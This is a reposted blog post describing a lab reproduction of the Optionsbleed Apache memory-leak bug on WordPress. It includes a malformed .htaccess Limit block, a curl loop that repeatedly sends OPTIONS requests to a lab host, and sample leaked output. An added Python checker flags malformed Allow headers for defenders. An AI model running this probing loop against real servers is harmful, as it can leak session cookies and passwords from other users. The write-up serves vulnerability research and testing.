Monday, 25 September 2017

The Optionsbleed Apache Vulnerability and WordPress


Over the weekend, our CTO Jonas Lejon did some research into the most recent Apache vulnerability, named Optionsbleed. Optionsbleed is a bug in the Apache webserver that makes it possible for an attacker to read remote webserver memory, such as session cookies, passwords, etc. Apache is a very common webserver, according to w3techs:
Apache is used by 48.9% of all the websites whose web server we know
In our lab we set up an Apache webserver, installed WordPress and added the following lines to .htaccess:
<Limit GET POST PUT REQUEST WPSCANS MPUT OKASDOAKSDOKASDIJ 12U1UH2OIEJ12OPEJOI IDJAIOSDJIOjd>
Allow from all
</Limit>
The above lines would probably trigger the vulnerability since the Limit-line contains some spelling errors.
With the following command line I was monitoring the Allow-header output to see if it returned something odd:
while true; do curl -sI -X OPTIONS http://hostname.dev/readme.html|grep "Allow:";sleep 0.1; done
Then I started to do different admin-related tasks such as login, logout and uploading. And sometimes I would see different data showing up in the curl request, such as:
Allow: GET,HEAD,POST,,sync-upload.php HTTP/1.1,HEAD,OPTIONS,,HEAD
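An added example, not part of the original post: a small Python check that can stand in for the grep in the loop above when testing your own server, flagging Allow values that are not a clean list of method names. The function names and the three finding kinds are assumptions made here; the sample value is the one shown above, and duplicates are a weaker signal than empty or non-token elements.

```python
import re

# RFC 7230 "token": the only characters a method name may legally contain.
TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")


def extract_allow(raw_headers):
    """Return the value of the first Allow header in a raw header block, or None."""
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "allow":
            return value.strip()
    return None


def audit_allow(value):
    """Return (index, kind, element) findings for one Allow header value."""
    findings = []
    seen = set()
    for i, raw in enumerate(value.split(",")):
        elem = raw.strip()
        if not elem:
            # ",," in the list: an element that should hold a method is blank.
            findings.append((i, "empty", elem))
        elif not TOKEN.fullmatch(elem):
            # Spaces, slashes etc. cannot occur in a method name.
            findings.append((i, "non-token", elem))
        elif elem in seen:
            findings.append((i, "duplicate", elem))
        seen.add(elem)
    return findings


if __name__ == "__main__":
    # Constructed header block wrapping the Allow value shown in the post.
    sample = (
        "HTTP/1.1 200 OK\r\n"
        "Server: Apache\r\n"
        "Allow: GET,HEAD,POST,,sync-upload.php HTTP/1.1,HEAD,OPTIONS,,HEAD\r\n"
        "\r\n"
    )
    for index, kind, elem in audit_allow(extract_allow(sample)):
        print(f"element {index}: {kind} {elem!r}")
```

Any "empty" or "non-token" finding on a server whose .htaccess files contain a Limit directive is a reason to review those directives and the installed Apache version.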
Source: https://managewp.org/articles/16181/the-optionsbleed-apache-vulnerability-and-wordpress




source https://williechiu40.wordpress.com/2017/09/25/the-optionsbleed-apache-vulnerability-and-wordpress/
